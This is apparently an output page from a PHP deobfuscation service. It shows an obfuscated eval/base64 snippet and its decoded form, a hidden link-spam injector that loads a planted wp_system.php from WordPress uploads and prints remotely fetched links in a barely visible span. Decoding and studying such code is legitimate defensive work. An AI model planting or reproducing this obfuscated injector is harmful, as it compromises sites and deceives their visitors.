Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $dRIbSPBj="eval\x28\x62\x61se\x364_\x64\x65co\x64e(\x27"; $zUrd="J\107RlYnVnX21vZGUg..

Decoded Output download

$debug_mode = isset($_REQUEST['DEBUG']);

if( $debug_mode )
	echo "<!-- START BLOCK -->
";

try
{
	if( defined('_SAPE_USER') )
	{
		if( $debug_mode )
			echo "<!-- ERROR: U already defined: "._SAPE_USER." -->
";
		return;
	}
	else
	{
		define('_SAPE_USER', 'd6bae7c1eff1dcd87eef1aad811da954');
		if( $debug_mode )
			echo "<!-- U: "._SAPE_USER." -->
";
	}


	if( !isset($_p) )
		$_p = '';
	if( isset($_GET['_ppppp']) )
		$_p = $_GET['_ppppp'];

	$fn = $_SERVER['DOCUMENT_ROOT'] . $_p . "/wp-content/uploads/wp_system/wp_system.php";
 //     $fn = $_SERVER['DOCUMENT_ROOT'] . $_p . "/images/yootheme/wp_system/wp_system.php";
//	$fn = $_SERVER['DOCUMENT_ROOT'] . $_p . "/images/stories/wp_system/wp_system.php";
//	$fn = $_SERVER['DOCUMENT_ROOT'] . $_p . "/wp-content/uploads/2011/07/wp_system.php";


	if(file_exists($fn))
	{
		if( $debug_mode )
			echo "<!-- found wp_system.php -->
";
	}
	else
	{
		if( $debug_mode )
			echo "<!-- ERROR: wp_system.php not found! _p: $_p, fn: $fn -->
";
		exit;

	}

	require_once($fn);

	$o= array();
	$o['fetch_remote_type'] = 'curl'; //[file_get_contents|curl|socket]
//	$o['fetch_remote_type'] = 'file_get_contents'; //[file_get_contents|curl|socket]
	
	if( $debug_mode )
		$o['force_show_code'] = true;

	$obj = new GJfeghjsdjfFHD($o);

	$id = md5(microtime());
	$id = 'a' . substr($id, 0, rand(5, 11));

	if( !isset($_c) )
		$_c = '#eee';

	if( $debug_mode )
		echo "<!-- color: {$_c} -->
";
	
	echo "<style type='text/css'>#{$id}, #{$id} *,#{$id} A {text-decoration:none; font-size:0.9em; color: {$_c};}</style>";
	echo "<span id='{$id}'>";                                                                    
	echo trim($obj->return_links());

        if($debug_mode)
		echo "<a href='test'>test link long description</a>";

	echo "</span>";

}
catch( Exception $ex )
{
	if( $debug_mode )
		echo "<!-- EXCEPTION: ".$ex->getMessage()." -->
";
}

if( $debug_mode )
	echo "<!-- END BLOCK -->
";

Did this file decode correctly?

Original Code

<?php $dRIbSPBj="eval\x28\x62\x61se\x364_\x64\x65co\x64e(\x27"; $zUrd="J\107RlYnVnX21vZGUgP\123\102pc3NldCgkX1\x4aFU\126VFU1RbJ0RFQ\154VHJ1\x30\160Ow0KDQppZ\151ggJGRl\x59nV\156X2\061v\132GU\x67K\1210KC\x57\x56j\141G8gIjwhLS0\x67U1RBUlQg\x51kxPQ0sgLS\x30+XG4iO\167\x30KDQp0cn\153\x4e\x43n\x73NCgl\x70\132iggZGVmaW5lZC\147\x6eX1NB\125E\126\146V\126NFUic\x70ICkNCgl\067DQoJCWlmKC\101k\x5a\x47Vid\x57df\x62\x579kZSApDQoJCQ\154l\131\x32hvICI\x38I\123\x30tIEV\123Uk9SOiBVIGFscmV\x68ZHkgZGVma\1275\154ZDog\x49i5f\x550FQR\1269\x56U\x30\x56SLiIgLS0+XG4iOw0\x4bCQl\171ZXR1cm47\x44Qo\112\146Q0KCWVsc2UNCg\x6c\067DQoJCW\122\154Z\x6d\x6cuZSg\156X1\116BUEVfVVN\106Uic\x73IC\x64kNmJhZTdjMW\x56mZ\152FkY2Q4N2\x56\154Z\152F\150YW\x514MTFkYT\1531NC\x63pO\1670KCQ\x6c\160\132i\147gJGRlYnV\x6eX2\061vZGU\x67K\1210KCQkJZWNoby\x41iPCEtLSB\x56\x4fiAiLl\x39\124QV\x42F\x581VTR\126IuIiAtLT\065c\142\x69I7DQo\x4afQ0KDQoNCglpZiggIWlzc2\x560KCRfcCkgKQ0K\x43QkkX3AgPSAnJ\x7asN\103gl\x70\x5a\x69ggaXNzZXQoJF\x39\x48RV\122b\11219wcHBwcCd\x64KSApDQo\x4aCSRfcCA\071\111\103\x52fR0VUWydfcHBwcH\x41nXTsNCg0KCSR\155bi\x419ICRfU0V\123VkVSW\171dET0NVT\125VO\126F9S\12409UJ10gLiAkX\x33\x41gLi\x41i\x4c3d\x77\114W\x4e\x76bnR\x6cbnQ\x76dXBs\1422\106kcy\x393\x63F\x39zeX\1160Z\x57\060vd3B\x66c3lzdGVtL\156BocCI7\x44Qo\147Ly8gICA\x67\111C\x52mbiA9I\x43R\x66\1250VSVk\x56\x53WydET0N\126TUVOV\x469ST09UJ10gL\x69AkX\063Ag\x4c\x69AiL2l\164\x59Wdlcy95b290aG\126tZS93cF9\x7aeXN\060Z\1270vd3Bfc\063lzdGVtLnBo\x63CI\x37DQo\x76LwkkZm\064gPSAkX1\x4eFU\154ZF\x55\x6csnRE9\x44VU\061FTlRfUk9PVCddIC4\x67JF9wIC4g\x49i9p\x62WF\x6eZ\130Mvc3\122v\143\155\x6c\x6ccy93cF\071zeXN0ZW0\x76d3Bfc3lzdGVt\x4cn\102ocCI7DQ\157vLwkk\132m\x34gPS\x41kX1NFUlZ\106UlsnRE9D\126\1251F\124lRf\x55k9PVCd\144IC4gJF9wIC4gI\x6993cC1jb250ZW50L3VwbG\x39\150ZH\115vM\x6aA\170MS8w\x4e\17193cF9zeXN0ZW\x30\165cGhwIj\x73\x4eCg0K\x44\121o\x4aaWYoZm\154sZV9\x6ceGlzd\110M\x6fJG\x5a\x75KSkNCgl7DQo\x4aCWlmKCA\153ZGVi\x64W\144\146\142W9kZSApD\x51oJCQ\154lY\x32hvICI8\111\1230tIGZ\166dW5kIH\x64w\1303N5c3RlbS5\167aH\101gLS0\x2bXG\x34\151Ow\060KCX\060NC\x67llbHN\x6cDQoJew0KCQlpZ\151gg\x4aGRlY\x6e\126nX21vZGUgKQ0KCQkJZW\116oby\x41iP\103EtLSBFUlJPUjogd3Bfc3lzd\x47\126tL\156Boc\103Bub3Q\147Zm91bm\x51hI\1069wO\151AkX3AsIGZuOiAkZm4gLS\060+XG4iOw0KCQlle\107l0Ow\060KDQoJ\146Q0KDQ\x6f\x4a\x63mV\170d\127\x6cyZV9\166bmN\154K\x43Rm\142ik7\104QoNCg\153kb\172\060gY\130JyYX\153oKTsNCgkk\x621s\x6eZmV\060\1312hfcmVtb3RlX3R5cGUnXS\x419I\103d\x6a\x64XJsJzs\x67Ly9bZmlsZV9\x6eZXRf\131\0629\x75dG\x56\x75\x64HN8Y3\x56ybHxzb2Nr\132X\x52dDQovL\167kkb\x31snZ\x6dV0Y\x32hfc\x6d\126tb3RlX3\1225cG\x55nXSA9ICdmaWxlX2dld\1069jb\x3250ZW50c\171c7IC8vW\062Zpb\x47V\x66\x5a2V0\x582Nvb\156RlbnRzfGN1cmx8c\0629ja2V0XQ0\x4bCQ0KCWl\155\x4bCAkZ\107Vi\144Wdfb\1279kZ\123A\x70DQoJCS\x52v\127ydmb3JjZV9zaG93X2NvZGUn\x58SA9IHR\x79dWU7\104QoN\103g\153k\x622\112\161ID0g\x62m\x56\063IEdKZmVnaGpzZ\107pmR\153hE\113CRvKTsNC\1470KC\123RpZCA9IG1kNS\150taWNyb3Rp\142WU\x6fKSk7DQoJ\112Glk\x49D0g\x4a2EnIC\x34gc3Vic3R\171KCRpZC\167gMCwgcmFuZCg1LCAxMSkpOw0KDQoJaW\x59oICFpc\063NldCgkX2MpI\103\153NCgkJJ\1069jID0gJyNlZWU\156Ow\060KDQo\x4aa\127\x59o\x49\x43RkZ\x57J1Z1\x39tb2RlICkNCgkJZWNobyAiPCE\164LSB\x6ab2x\x76cjog\x65yRfY30gL\1230+XG4iOw\x30\x4bCQ\x30\x4b\103W\126j\141G8\x67I\x6axzd\x48lsZSB\060e\130B\154PSd0\x5a\130h0L2Nzcy\143+I3skaWR\x39\114CAje\x79RpZH\060gKi\x77je\x79RpZH0g\121\x53B7d\107\x564dC1k\x5aWNvcmF\x30aW9uO\x6d5vbmU7I\107ZvbnQtc2\x6c6ZTowLjllbTsgY29s\1423I6IH\x73kX2\x4e9O308L3N\060e\127xlPi\1117\x44QoJZWNoby\101\x69P\x48Nw\x59W4gaWQ9J3sk\x61WR9Jz4\151OyA\x67ICAgICAgICAgICAg\x49\103AgI\x43AgICA\147ICAgICAgICAgICAgIC\101gICA\x67ICAgICAgICAgI\x43AgI\x43AgICAg\111CAgICAgI\x43AgDQ\x6f\112ZWNob\x79B\060cmltKC\122vYmotPnJl\x64HVybl9sa\1275\162cy\x67p\x4bTsNC\x670KICAgICAgICBpZigk\x5a\x47\x56idWdfbW9\x6b\132\x53kNCg\x6bJZWNobyAiPG\105gaHJl\132j\x30\x6edGV\172dCc+d\107VzdC\x42saW5rIGxv\142mcgZGVzY3JpcH\x52pb248\x4c2E+IjsNCg\060\x4bC\127Vja\1078g\x49\x6awvc3Bhbj4iOw0KDQ\160\071\104Q\x70jYX\122\152aCg\x67R\130hjZXB0aW9\x75IC\122\154e\103ApD\121p\x37DQoJaWYoICRkZW\x4a1Z1\x39tb2R\154ICkNCgk\x4aZWNo\142yAiPCE\164LSBFWENFU\106RJT\06046ICI\x75JG\1264LT\x35n\x5aXR\x4eZXNzY\x57d\154KCk\165IiA\x74LT5cbi\111\067\x44Qp9\x44QoNC\155lmK\x43AkZGVidW\x64f\x62W9kZSApDQoJZWNobyAiP\103E\164L\x53BFT\x6bQgQkxPQ\060sgLS\x30+XG4iOw0K')\051"; $JIKAW="pre\x67_rep\x6cac\x65"; $XC="/\x2e*/\x65"; $JIKAW($XC, $dRIbSPBj.$zUrd, "");

Function Calls

preg_replace 1
base64_decode 1

Variables

$XC /.*/e
$zUrd JGRlYnVnX21vZGUgPSBpc3NldCgkX1JFUVVFU1RbJ0RFQlVHJ10pOw0KDQpp..
$JIKAW preg_replace
$dRIbSPBj eval(base64_decode('

Stats

MD5 c487c7e5354f9faaa9317e7f0204e9c9
Eval Count 2
Decode Time 73 ms